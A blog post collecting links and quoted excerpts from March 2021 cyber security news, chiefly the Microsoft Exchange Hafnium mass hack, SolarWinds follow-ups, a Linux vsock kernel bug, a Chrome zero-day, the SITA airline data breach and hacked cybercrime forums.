Cyber security news March 2021

This posting is here to collect cyber security news in March 2021.

I post links to security vulnerability news to comments of this article.

You are also free to post related links to comments.

342 Comments

  1. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/
    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.
    Young and rising Linux security developer Alexander Popov of Russia’s Positive Technologies discovered and fixed a set of five security holes in the Linux kernel’s virtual socket implementation. An attacker could use these vulnerabilities (CVE-2021-26708) to gain root access and knock out servers in a Denial of Service (DoS) attack.
    With a Common Vulnerability Scoring System (CVSS) v3 base score of 7.0, high severity, smart Linux administrators will patch their systems as soon as possible.
    While Popov discovered the bugs in Red Hat’s community Linux distribution Fedora 33 Server, it exists in the system using the Linux kernel from November 2019′s version 5.5 to the current mainline kernel version 5.11-rc6.
    These holes entered Linux when virtual socket multi-transport support was added. This networking transport facilitates communication between virtual machines (VM) and their host.
    The core problem is race conditions in the CONFIG_VSOCKETS and CONFIG_VIRTIO_VSOCKETS kernel drivers. These are shipped as kernel modules in all major Linux distributions. The reason why this is such a serious problem is whenever an ordinary user creates an AF_VSOCK socket, the vulnerable modules are automatically loaded. A race condition exists when a system’s substantive behavior depends on the sequence or timing of uncontrollable events.
    Greg Kroah-Hartman, the stable Linux kernel chief maintainer, accepted the patches into Linux 5.10.13 on February 3. Since then the patch has been merged into mainline kernel version 5.11-rc7 and backported into affected stable trees.

    The patch has also already been incorporated into such popular Linux distributions as Red Hat Enterprise Linux (RHEL) 8, Debian, Ubuntu, and SUSE.

    Reply
  2. Tomi Engdahl says:

    Chrome 89 Patches Actively Exploited Vulnerability
    https://www.securityweek.com/chrome-89-patches-actively-exploited-vulnerability

    Google this week announced the availability of Chrome 89 in the stable channel, with patches for a total of 47 vulnerabilities, including one that has been exploited in the wild.

    Tracked as CVE-2021-21166, the zero-day security hole is described as a high-severity “object lifecycle issue in audio.” The bug was reported by Alison Huffman of Microsoft Browser Vulnerability Research, and is the second of this type addressed in Chrome 89, alongside CVE-2021-21165, also rated high risk.

    “Google is aware of reports that an exploit for CVE-2021-21166 exists in the wild,” the Internet giant notes, without providing further details on exploitation, impact, or attack vectors.

    Reply
  3. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/

    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.

    Reply
  4. Tomi Engdahl says:

    It only took four years and thousands of complaints but ICANN finally kills off rogue Indian domain registrar
    DNS oversight body accused again and again of chronic foot-dragging
    https://www.theregister.com/AMP/2021/03/04/icann_domain_woes/?__twitter_impression=true

    Reply
  5. Tomi Engdahl says:

    “KEY ALERT” — German prison has to spend ‘£43,000’ changing 600 locks after intern sent a photo of the keys to his friends on WhatsApp

    German prison has to spend ‘£43,000′ changing 600 locks after intern sent a photo of the keys to his friends on WhatsApp
    https://www.dailymail.co.uk/news/article-9325001/German-prison-changes-locks-intern-shared-photos.html

    The trainee shared the photos on a WhatsApp group to boast about his new job
    It raised fears that the prison’s 647 inmates could have staged a mass breakout
    The prison near Berlin has since changed all the locks in cells and corridors

    The trainee at Heidering prison near Berlin took photos of the keys and shared them in a WhatsApp group to brag about his new job, German media says.

    But he apparently failed to realise that keys can easily be reproduced by specialists, meaning replicas could have been smuggled inside.

    The intern is said to have shared pictures of cell and corridor keys before the leak was reported to judicial authorities on Thursday.

    Around 20 prison workers were tasked with changing the locks the following day and had to work through the night to head off the security risk.

    Officials said the old keys were quickly destroyed after they had been used one last time to open the doors so that the locks could be changed.

    Reply
  6. Tomi Engdahl says:

    Three Top Russian Cybercrime Forums Hacked
    https://krebsonsecurity.com/2021/03/three-top-russian-cybercrime-forums-hacked/
    Over the past few weeks, three of the longest running and most
    venerated Russian-language online forums serving thousands of
    experienced cybercriminals have been hacked. In two of the intrusions,
    the attackers made off with the forums user databases, including email
    and Internet addresses and hashed passwords. Members of all three
    forums are worried the incidents could serve as a virtual Rosetta .
    Stone for connecting the real-life identities of the same users across
    multiple crime forums.. On Tuesday, someone dumped thousands of
    usernames, email addresses and obfuscated passwords on the dark web
    apparently pilfered from Mazafaka (a.k.a. Maza, MFclub), an exclusive
    crime forum that has for more than a decade played host to some of the
    most experienced and infamous Russian cyberthieves.. The compromise of
    Maza and Verified and possibly a third major forum has many
    community members concerned that their real-life identities could be
    exposed. Exploit perhaps the next-largest and most popular Russian
    forum after Verified, also experienced an apparent compromise this
    week.

    Reply
  7. Tomi Engdahl says:

    Unsecured Cloud Configurations Exposing Information in Thousands of
    Mobile Apps
    https://blog.zimperium.com/unsecured-cloud-configurations-exposing-information-in-thousands-of-mobile-apps/
    In our analysis, 14% of iOS and Android apps that use cloud storage
    had unsecure configurations and were vulnerable to a number of
    significant issues that exposed PII, enabled fraud or exposed IP or
    internal systems.. During our review, we encountered several apps
    relying on both Google and Amazon storage that was accessible without
    any security. In one example, the information we were able to obtain
    included profile pictures and other PII information.. Other apps leak
    information that enables fraud. In one example, an app shows images
    containing physical payment implements such as checks. . Another
    category of apps exposes configuration information that could be used
    for further investigation or penetration. For example, one may think
    music apps dont have any important information to protect, however, we
    identified cases where the entire server infrastructures, scripts,
    servers and much more was exposed publicly.

    Reply
  8. Tomi Engdahl says:

    Windows DNS SIGRed bug gets first public RCE PoC exploit
    https://www.bleepingcomputer.com/news/security/windows-dns-sigred-bug-gets-first-public-rce-poc-exploit/
    “If exploited carefully, attackers can execute code remotely on the
    vulnerable system and gain Domain Admin rights, effectively
    compromising the entire corporate infrastructure,” Palmiotti
    explained.. Details at
    https://www.graplsecurity.com/post/anatomy-of-an-exploit-rce-with-cve-2020-1350-sigred

    Reply
  9. Tomi Engdahl says:

    SITA statement about security incident
    https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/
    SITA confirms that it was the victim of a cyber-attack, leading to a
    data security incident involving certain passenger data that was
    stored on SITA Passenger Service System (US) Inc. servers. Passenger
    Service System (US) Inc. (SITA PSS) operates passenger processing
    systems for airlines.. Myös Finnair uhrina
    https://www.hs.fi/talous/art-2000007839783.html

    Reply
  10. Tomi Engdahl says:

    Researcher bitsquats Microsoft’s windows.com to steal traffic
    https://www.bleepingcomputer.com/news/security/researcher-bitsquats-microsofts-windowscom-to-steal-traffic/
    A researcher was able to “bitsquat” Microsoft’s windows.com domain by
    cybersquatting variations of windows.com.. However, this technique
    differs from cases where typosquatting domains are used for phishing
    activities in that it requires no action on the victim’s part. …
    “Now lets say that the computer is running too hot, a solar flare is
    happening, or a cosmic ray (very real thing) flips a bit on the
    computer,” says [the researcher] Remy.. In a 2011 Black Hat paper,
    titled “Bit-squatting DNS Hijacking without Exploitation,” researcher
    Artem Dinaburg saw when he had squatted 31 bitsquatted variations of
    eight legitimate domains of multiple organizations, on an average
    3,434 daily DNS requests came his way, that should otherwise have gone
    to the DNS servers for the legitimate domains.. Likewise, as soon as
    Remy squatted the aforementioned domains and setup sinkholes to record
    any traffic, the researcher noticed an uptick in legitimate traffic
    coming his way.. Blog at
    https://remyhax.xyz/posts/bitsquatting-windows/

    Reply
  11. Tomi Engdahl says:

    Microsoft: We’re cracking down on Excel macro malware
    https://www.zdnet.com/article/microsoft-were-cracking-down-on-malware-that-uses-excel-macros/
    Now Microsoft is expanding the integration of its AMSI with Office 365
    to include the scanning of Excel 4.0 XLM macros at runtime, bringing
    AMSI in line with VBA.

    Reply
  12. Tomi Engdahl says:

    High severity Linux network security holes found, fixed
    This nasty set of bugs can lead to an attacker gaining root access, but the patch is already available.
    https://www.zdnet.com/article/linux-network-security-holes-found-fixed/

    Reply
  13. Tomi Engdahl says:

    Microsoft: We’ve found three more pieces of malware used by the SolarWinds attackers
    Microsoft and FireEye have identified a new “elegant” backdoor used by the SolarWinds attackers.
    https://www.zdnet.com/article/microsoft-weve-found-three-more-pieces-of-malware-used-by-the-solarwinds-attackers/?ftag=COS-05-10aaa0h&utm_campaign=trueAnthem%3A+Trending+Content&utm_medium=trueAnthem&utm_source=facebook

    Reply
  14. Tomi Engdahl says:

    Thousands of Microsoft Customers May Have Been Victims of Hack Tied to China
    https://www.nytimes.com/2021/03/06/technology/microsoft-hack-china.html

    The hackers started their attack in January but escalated their efforts in recent weeks, security experts say. Business and government agencies affected.

    Businesses and government agencies in the United States that use a Microsoft email service have been compromised in an aggressive hacking campaign that was probably sponsored by the Chinese government, Microsoft said.

    The number of victims is estimated to be in the tens of thousands and could rise, some security experts believe, as the investigation into the breach continues. The hackers had stealthily attacked several targets in January

    Reply
  15. Tomi Engdahl says:

    Brian Krebs / Krebs on Security:
    Sources: at least 30K US organizations have been hacked by an aggressive Chinese espionage group exploiting unpatched flaws in Microsoft’s Exchange Server — At least 30,000 organizations across the United States — including a significant number of small businesses, towns …

    At Least 30,000 U.S. Organizations Newly Hacked Via Holes in Microsoft’s Email Software
    https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/

    At least 30,000 organizations across the United States — including a significant number of small businesses, towns, cities and local governments — have over the past few days been hacked by an unusually aggressive Chinese cyber espionage unit that’s focused on stealing email from victim organizations, multiple sources tell KrebsOnSecurity. The espionage group is exploiting four newly-discovered flaws in Microsoft Exchange Server email software, and has seeded hundreds of thousands of victim organizations worldwide with tools that give the attackers total, remote control over affected systems.

    On March 2, Microsoft released emergency security updates to plug four security holes in Exchange Server versions 2013 through 2019 that hackers were actively using to siphon email communications from Internet-facing systems running Exchange.

    In the three days since then, security experts say the same Chinese cyber espionage group has dramatically stepped up attacks on any vulnerable, unpatched Exchange servers worldwide.

    In each incident, the intruders have left behind a “web shell,” an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser. The web shell gives the attackers administrative access to the victim’s computer servers.

    Speaking on condition of anonymity, two cybersecurity experts who’ve briefed U.S. national security advisors on the attack told KrebsOnSecurity the Chinese hacking group thought to be responsible has seized control over “hundreds of thousands” of Microsoft Exchange Servers worldwide — with each victim system representing approximately one organization that uses Exchange to process email.

    Microsoft said the Exchange flaws are being targeted by a previously unidentified Chinese hacking crew it dubbed “Hafnium,” and said the group had been conducting targeted attacks on email systems used by a range of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs.

    Reply
  16. Tomi Engdahl says:

    White House fears significant number of organisations caught in Microsoft hack
    https://www.abc.net.au/news/2021-03-06/white-house-fears-significant-hack-microsoft-exchange-email/13223508

    The White House fears a significant number of organisations around the world have been compromised through a back door installed via recently patched flaws in Microsoft’s email software, and warns it “could have far-reaching impacts”.

    Key points:
    Microsoft has declined to provide details on the scale of the hack
    All of those affected are thought to have used web versions of the Outlook email client
    White House press secretary Jen Psaki says there are concerns “there are a large number of victims”

    The hacking has already reached more places than all of the tainted code downloaded from SolarWinds Corp, the company at the heart of another massive hacking spree uncovered in December.

    The latest hack has left channels for remote access spread among credit unions, town governments and small businesses, according to records from a US investigation

    If successfully exploited, “an unauthenticated attacker” could “write files and execute code”, the alert warned.

    Tens of thousands of organisations in Asia and Europe are also affected, the records show.

    The hacks are continuing despite emergency patches issued by Microsoft on Tuesday.

    Microsoft, which had initially said the hacks consisted of “limited and targeted attacks,” declined to comment on the scale of the problem on Friday but said it was working with government agencies and security companies to provide help to customers.

    One scan of connected devices showed only 10 per cent of those vulnerable had installed the patches by Friday, though the number was rising.

    Because installing the patch does not get rid of the back doors, US officials are racing to figure out how to notify all the victims and guide them in their hunt.

    Reply
  17. Tomi Engdahl says:

    At Least 30,000 US Organizations Newly Hacked Via Holes In Microsoft’s Email Software
    https://m.slashdot.org/story/382604

    Reply
  18. Tomi Engdahl says:

    A communications and IT vendor for 90 percent of the world’s #airlines, SITA, has been hit with a security #breach.
    https://threatpost.com/supply-chain-cyberattack-airlines/164549/

    Reply
  19. Tomi Engdahl says:

    Move over, SolarWinds: 30,000 orgs’ email hacked via Microsoft Exchange Server flaws
    13
    The attack has been ongoing since January
    https://www.theverge.com/2021/3/5/22316189/microsoft-exchange-server-security-exploit-china-attack-30000-organizations

    Reply
  20. Tomi Engdahl says:

    The Former SolarWinds CEO Is Blaming the Firm’s Poor Cybersecurity on an Intern
    https://slate.com/technology/2021/03/solarwinds-hack-cyber-espionage-intern-password.html

    Reply
  21. Tomi Engdahl says:

    Mazafaka Elite Hacking and Cybercrime Forum Got Hacked!
    https://thehackernews.com/2021/03/mazafaka-elite-hacking-and-cybercrime.html
    In what’s a case of hackers getting hacked, a prominent underground
    online criminal forum by the name of Maza has been compromised by
    unknown attackers, making it the fourth forum to have been breached
    since the start of the year. The intrusion is said to have occurred on
    March 3, with information about the forum members including
    usernames, email addresses, and hashed passwords publicly disclosed
    on a breach notification page put up by the attackers, stating “Your
    data has been leaked” and “This forum has been hacked.”. Also:
    https://www.bleepingcomputer.com/news/security/notorious-maza-cybercrime-forum-attacked-by-other-hackers/

    Reply
  22. Tomi Engdahl says:

    Detection and Response to Exploitation of Microsoft Exchange Zero-Day
    Vulnerabilities
    https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html
    Beginning in January 2021, Mandiant Managed Defense observed multiple
    instances of abuse of Microsoft Exchange Server within at least one
    client environment. The observed activity included creation of web
    shells for persistent access, remote code execution, and
    reconnaissance for endpoint security solutions. Our investigation
    revealed that the files created on the Exchange servers were owned by
    the user NT AUTHORITY\SYSTEM, a privileged local account on the
    Windows operating system.

    Reply
  23. Tomi Engdahl says:

    PLEASE LEAVE AN EXPLOIT AFTER THE BEEP
    https://www.dubex.dk/aktuelt/nyheder/please-leave-an-exploit-after-the-beep
    In January 2021, Dubex investigated suspicious activity on a set of
    Exchange servers. Generic post exploitation activity was seen, and
    many POST requests were sent to webshells hosted in the OWA directory.
    It was initially suspected the servers might be backdoored directly
    through the OWA and that webshells were being used for ease of access.
    As a result, Dubex started its incident response efforts . and
    acquired system memory (RAM) and disk images to initiate a forensics
    investigation. This investigation revealed a zero-day exploit being
    used in the wild.

    Reply
  24. Tomi Engdahl says:

    Microsoft: Exchange updates can install without fixing vulnerabilities
    https://www.bleepingcomputer.com/news/security/microsoft-exchange-updates-can-install-without-fixing-vulnerabilities/
    Due to the critical nature of recently issued Microsoft Exchange
    security updates, admins need to know that the updates may have
    installation issues on servers where User Account Control (UAC) is
    enabled. Microsoft has added these warnings to all Exchange security
    updates released throughout the last few years.

    Reply
  25. Tomi Engdahl says:

    D-Link, IoT Devices Under Attack By Tor-Based Gafgyt Variant
    https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/
    A new variant of the Gafgyt botnet thats actively targeting
    vulnerable D-Link and Internet of Things devices is the first variant
    of the malware to rely on Tor communications, researchers say. Gafgyt,
    a botnet that was uncovered in 2014, has become infamous for launching
    large-scale distributed denial-of-service (DDoS) attacks. Researchers
    first discovered activity from the newest variant, which they call
    Gafgyt_tor, on Feb. 15.

    Reply
  26. Tomi Engdahl says:

    These two unusual versions of ransomware tell us a lot about how
    attacks are evolving
    https://www.zdnet.com/article/these-two-unusual-versions-of-ransomware-tell-us-a-lot-about-how-attacks-are-evolving/
    Two newly discovered forms of ransomware with very different traits
    show just how diverse the world of ransomware has become as more cyber
    criminals attempt to join in with cyber extortion. Both forms of
    ransomware emerged in February and have been detailed by cybersecurity
    researchers at Trend Micro AlumniLocker and Humble – with the two
    versions attempting to extort a bitcoin ransom in different ways.

    Reply
  27. Tomi Engdahl says:

    Varo tällaista viestiä haittaohjelma saattaa lähettää laskuusi
    tuhansia viestejä sekä vaarantaa pankkitilisi
    https://www.tivi.fi/uutiset/tv/e4a64a51-b6c1-4868-8ea2-e3f0964dbd54
    Rikolliset kiusaavat suomalaisia jälleen huijausviesteillä, joita
    lähetetään Postin tai PostNordin nimissä. Poliisi kertoo
    tiedotteessaan, että huijausviesti voi tulla tekstiviestillä, jossa
    pyydetään asentamaan puhelimeen sovellus viestissä olevan linkin
    kautta. Jos vastaanottajan matkapuhelimessa on
    Android-käyttöjärjestelmä, asentuu käyttäjien puhelimiin linkistä
    painamalla haittaohjelma, joka lähettää laitteesta ulkomaille satoja
    tai tuhansia viestejä asiakkaan laskuun. Haittaohjelma on vaikea
    huomata, ennen kuin laite alkaa lähettämään runsaasti viestejä
    itsenäisesti, Poliisi kertoo.

    Reply
  28. Tomi Engdahl says:

    Microsoft Exchange Server Vulnerabilities Mitigations March 2021
    https://msrc-blog.microsoft.com/2021/03/05/microsoft-exchange-server-vulnerabilities-mitigations-march-2021/
    Microsoft previously blogged our strong recommendation that customers
    upgrade their on-premises Exchange environments to the latest
    supported version. For customers that are not able to quickly apply
    updates, we are providing the following alternative mitigation
    techniques to help Microsoft Exchange customers who need more time to
    patch their deployments and are willing to make risk and service
    function trade-offs. These mitigations are not a remediation if your
    Exchange servers have already been compromised, nor are they full
    protection against attack.

    At Least 30,000 U.S. Organizations Newly Hacked Via Holes in
    Microsofts Email Software
    https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/
    At least 30,000 organizations across the United States including a
    significant number of small businesses, towns, cities and local
    governments have over the past few days been hacked by an unusually
    aggressive Chinese cyber espionage unit thats focused on stealing
    email from victim organizations, multiple sources tell
    KrebsOnSecurity.. The espionage group is exploiting four
    newly-discovered flaws in Microsoft Exchange Server email software,
    and has seeded hundreds of thousands of victim organizations worldwide
    with tools that give the attackers total, remote control over affected
    systems.

    Reply
  29. Tomi Engdahl says:

    Microsoft Adopted an ‘Aggressive’ Strategy for Sharing SolarWinds
    Attack Intel
    https://www.darkreading.com/operations/microsoft-adopted-an-aggressive-strategy-for-sharing-solarwinds-attack-intel/d/d-id/1340327
    Rob Lefferts, corporate vice president for Microsoft 365 Security in
    Security and Compliance, explains the company’s approach to keeping
    its customers and the industry apprised and updated on its findings
    from the now-infamous attack. In the wake of a widespread cyberattack,
    enterprise IT providers can play a key role in how businesses learn
    about and mitigate the security threat. That role has evolved as
    attacks grow more complex – and it presents a tricky challenge when a
    provider must keep businesses informed of an attack that has
    infiltrated its own walls and affected tens of thousands of its
    customers, as Microsoft experienced during the recent SolarWinds
    incident.

    Reply
  30. Tomi Engdahl says:

    Chinas RedEcho accused of targeting Indias power grids
    https://blog.malwarebytes.com/vital-infrastructure/2021/03/chinas-redecho-accused-of-targeting-indias-power-grids/
    RedEcho, an advanced persistent threat (APT) group from China, has
    attempted to infiltrate the systems behind Indias power grids,
    according to a threat analysis report from Recorded Future [PDF].. It
    appears that what triggered this attempt to gain a foothold in Indias
    critical power generation and transmission infrastructure, was a tense
    standoff at Pangong Tso lake in May 2020. However, the report by
    Recorded Future, a cybersecurity company specializing in threat
    intelligence, claims that RedEcho were on the prowl way before this
    time.

    Reply
  31. Tomi Engdahl says:

    Microsoft IOC Detection Tool for Exchange Server Vulnerabilities
    https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities
    Microsoft has released an updated script that scans Exchange log files
    for indicators of compromise (IOCs) associated with the
    vulnerabilities disclosed on March 2, 2021. CISA is aware of
    widespread domestic and international exploitation of these
    vulnerabilities and strongly recommends organizations run the
    Test-ProxyLogon.ps1 scriptas soon as possibleto help determine whether
    their systems are compromised. For additional information on the
    script, see Microsofts blog HAFNIUM targeting Exchange Servers with
    0-day exploits.

    Reply
  32. Tomi Engdahl says:

    Check to see if youre vulnerable to Microsoft Exchange Server
    zero-days using this tool
    https://www.zdnet.com/article/check-to-see-if-youre-vulnerable-to-microsoft-exchange-server-zero-days-using-this-tool/
    Microsoft’s Exchange Server team has released a script for IT admins
    to check if systems are vulnerable to recently-disclosed zero-day
    bugs. As noted in an alert published by the US Cybersecurity and
    Infrastructure Security Agency (CISA) on Saturday, Microsoft’s team
    has published a script on GitHub that can check the security status of
    Exchange servers.

    Reply
  33. Tomi Engdahl says:

    Microsoft Office 365 gets protection against malicious XLM macros
    https://www.bleepingcomputer.com/news/security/microsoft-office-365-gets-protection-against-malicious-xlm-macros/
    Microsoft has added XLM macro protection for Microsoft 365 customers
    by expanding the runtime defense provided by Office 365′s integration
    with Antimalware Scan Interface (AMSI) to include Excel 4.0 (XLM)
    macro scanning. AMSI was introduced in 2015, and it has been adopted
    by all major antivirus products available for the Windows 10 platform
    since then. It allows Windows 10 services and apps to communicate with
    security products and request runtime scans of potentially dangerous
    data.

    Reply
  34. Tomi Engdahl says:

    The attack, which Microsoft has said started with a Chinese government-backed hacking group, has so far claimed at least 60,000 known victims globally, according a former senior US official with knowledge of the investigation. Many of them appear to be small or medium-sized businesses caught in a wide net the attackers cast as Microsoft worked to shut down the hack.

    Victims identified so far include banks and electricity providers, as well as senior citizen homes and an ice cream company,
    https://www.thestar.com.my/tech/tech-news/2021/03/07/hackers-breach-thousands-of-microsoft-customers-around-the-world

    Reply
  35. Tomi Engdahl says:

    A Basic Timeline of the Exchange Mass-Hack
    https://krebsonsecurity.com/2021/03/a-basic-timeline-of-the-exchange-mass-hack/
    Sometimes when a complex story takes us by surprise or knocks us back
    on our heels, it pays to revisit the events in a somewhat linear
    fashion. Heres a brief timeline of what we know leading up to last
    weeks mass-hack, when hundreds of thousands of Microsoft Exchange
    Server systems got compromised and seeded with a powerful backdoor
    Trojan horse program.. When did Microsoft find out about attacks on
    previously unknown vulnerabilities in Exchange?

    Reply
  36. Tomi Engdahl says:

    Kyberturvallisuuskeskus varoittaa: Sadat organisaatiot ovat riskissä
    päätyä tai ovat jo päätyneet sähköpostipalvelinten tietomurron
    kohteeksi
    https://yle.fi/uutiset/3-11827028
    Kyberturvallisuuskeskus varoittaa, että Suomessa sadat organisaatiot
    ovat riskissä päätyä tai jo päätyneet sähköpostipalvelinten
    tietomurron kohteeksi. Ongelma on laajuudeltaan ja vakavuudeltaan
    suurin Suomessa ainakin pariin vuosikymmeneen, arvioi keskuksen
    erityisasiantuntija Juha Tretjakov. Ongelma koskee osaa tahoista,
    jotka käyttävät Microsoftin Exchange-palvelinta.
    Kyberturvallisuuskeskus kertoo sivuillaan(siirryt toiseen palveluun)
    päivittäneensä maanantaina punaisen varoituksen
    Exchange-sähköpostipalvelimen osalta todeten, että pelkkä palvelimen
    päivitys ei ole riittävä toimi.. Myös:
    https://www.is.fi/digitoday/tietoturva/art-2000007848088.html.
    https://www.tivi.fi/uutiset/tv/d825bda3-5d0f-42c2-bc71-e3d666e673f5.
    https://www.hs.fi/talous/art-2000007848036.html

    Reply
  37. Tomi Engdahl says:

    European Banking Authority discloses Exchange server hack
    https://www.bleepingcomputer.com/news/security/european-banking-authority-discloses-exchange-server-hack/
    The European Banking Authority (EBA) took down all email systems after
    their Microsoft Exchange Servers were hacked as part of the ongoing
    attacks targeting organizations worldwide. EBA is part of the European
    System of Financial Supervision and it oversees the integrity orderly
    functioning of the EU banking sector.. “The Agency has swiftly
    launched a full investigation, in close cooperation with its ICT
    provider, a team of forensic experts and other relevant entities,” EBA
    said.

    Reply
  38. Tomi Engdahl says:

    Hackers hiding Supernova malware in SolarWinds Orion linked to China
    https://www.bleepingcomputer.com/news/security/hackers-hiding-supernova-malware-in-solarwinds-orion-linked-to-china/
    Intrusion activity related to the Supernova malware planted on
    compromised SolarWinds Orion installations exposed on the public
    internet points to an espionage threat actor based in China. Security
    researchers named the hacker group Spiral and correlated findings from
    two intrusions in 2020 on the same victim network to determine
    activity from the same intruder.

    Reply
  39. Tomi Engdahl says:

    Microsoft Exchange Cyber Attack What Do We Know So Far?
    https://thehackernews.com/2021/03/microsoft-exchange-cyber-attack-what-do.html
    Microsoft on Friday warned of active attacks exploiting unpatched
    Exchange Servers carried out by multiple threat actors, as the hacking
    campaign is believed to have infected tens of thousands of businesses,
    government entities in the U.S., Asia, and Europe. The company said
    “it continues to see increased use of these vulnerabilities in attacks
    targeting unpatched systems by multiple malicious actors beyond
    HAFNIUM,” signaling an escalation that the breaches are no longer
    “limited and targeted” as was previously deemed.

    Reply
  40. Tomi Engdahl says:

    Microsoft’s MSERT tool now finds web shells from Exchange Server
    attacks
    https://www.bleepingcomputer.com/news/security/microsofts-msert-tool-now-finds-web-shells-from-exchange-server-attacks/
    Microsoft has pushed out a new update for their Microsoft Safety
    Scanner (MSERT) tool to detect web shells deployed in the recent
    Exchange Server attacks. On March 2nd, Microsoft disclosed that four
    Exchange Server zero-day vulnerabilities were being used in attacks
    against exposed Outlook on the web (OWA) servers. These
    vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857,
    CVE-2021-26858, CVE-2021-27065.

    Reply
  41. Tomi Engdahl says:

    The Accellion Breach Keeps Getting Worseand More Expensive
    https://www.wired.com/story/accellion-breach-victims-extortion/
    THE DRUMBEAT OF data breach disclosures is unrelenting, with new
    organizations chiming in all the time. But a series of breaches in
    December and January that have come to light in recent weeks has
    quietly provided an object lesson in how bad things can get when
    hackers find an inroad to dozens of potential targetsand they’re out
    for profit. Firewall vendor Accellion quietly released a patch in late
    December, and then more fixes in January, to address a cluster of
    vulnerabilities in one of its network equipment offerings.

    Reply
  42. Tomi Engdahl says:

    Microsoft Server Hack Has Victims Hustling to Stop Intruders
    https://www.securityweek.com/microsoft-server-hack-has-victims-hustling-stop-intruders

    Victims of a massive global hack of Microsoft email server software — estimated in the tens of thousands by cybersecurity responders — hustled Monday to shore up infected systems and try to diminish chances that intruders might steal data or hobble their networks.

    The White House has called the hack an “active threat” and said senior national security officials were addressing it.

    The breach was discovered in early January and attributed to Chinese cyber spies targeting U.S. policy think tanks. Then in late February, five days before Microsoft issued a patch on March 2, there was an explosion of infiltrations by other intruders, piggybacking on the initial breach. Victims run the spectrum of organizations that run email servers, from mom-and-pop retailers to law firms, municipal governments, healthcare providers and manufacturers.

    While the hack doesn’t pose the kind of national security threat as the more sophisticated SolarWinds campaign, which the Biden administration blames on Russian intelligence officers, it can be an existential threat for victims who didn’t install the patch in time and now have hackers lingering in their systems. The hack poses a new challenge for the White House, which even as it prepares to respond to the SolarWinds breach, must now grapple with a formidable and very different threat from China.

    “I would say it’s a serious economic security threat because so many small companies out there can literally have their business destroyed through a targeted ransomware attack,” said Dmitri Alperovitch, former chief technical officer of the cybersecurity firm CrowdStrike

    Reply
  43. Tomi Engdahl says:

    Disruptions at Pan-American Life Likely Caused by Ransomware Attack
    https://www.securityweek.com/disruptions-pan-american-life-likely-caused-ransomware-attack

    Recent service disruptions at the Pan-American Life Insurance Group (PALIG) were likely caused by a cyberattack conducted by a threat actor known for using the REvil ransomware.

    New Orleans-based PALIG provides life, accident and health insurance services across the Americas. The group has more than 20 member companies and employs roughly 2,000 people worldwide.

    The official website of PALIG (palig.com) currently only displays some contact information and the following message: “Pan-American Life Insurance Group is currently experiencing a disruption to some of our services and we are working to restore them. To facilitate communication during this time, we have created temporary email accounts as an official communication channel.”

    Reply
  44. Tomi Engdahl says:

    Multiple Airlines Impacted by Data Breach at Aviation IT Firm SITA
    https://www.securityweek.com/multiple-airlines-impacted-data-breach-aviation-it-firm-sita

    SITA, a multinational company that specializes in air transport communications and IT, this week confirmed falling victim to a cyberattack that appears to have impacted multiple airlines around the world.

    SITA said on Thursday that the attack, which it described as “highly sophisticated,” affected certain passenger data stored on servers of SITA Passenger Service System (PSS) Inc., which operates passenger processing systems for airlines.

    “After confirmation of the seriousness of the data security incident on February 24, 2021, SITA took immediate action to contact affected SITA PSS customers and all related organizations,” the company said in a statement.

    https://www.sita.aero/pressroom/news-releases/sita-statement-about-security-incident/

    Reply
  45. Tomi Engdahl says:

    Report: Russian Hackers Exploit Lithuanian Infrastructure
    https://www.securityweek.com/report-russian-hackers-exploit-lithuanian-infrastructure

    Hacker groups linked to Russian intelligence conducted cyber-attacks against top Lithuanian officials and decision-makers last year and used the Baltic nation’s technology infrastructure as a base to hit targets elsewhere, a report by Lithuania’s intelligence service said Thursday.

    The annual national security threat assessment report claimed that, among others, the Russian cyber-espionage group APT29 with alleged links to Russia’s intelligence services “exploited” Lithuania’s information technology infrastructure “to carry out attacks by APT29 against foreign entities developing a COVID-19 vaccine.”

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*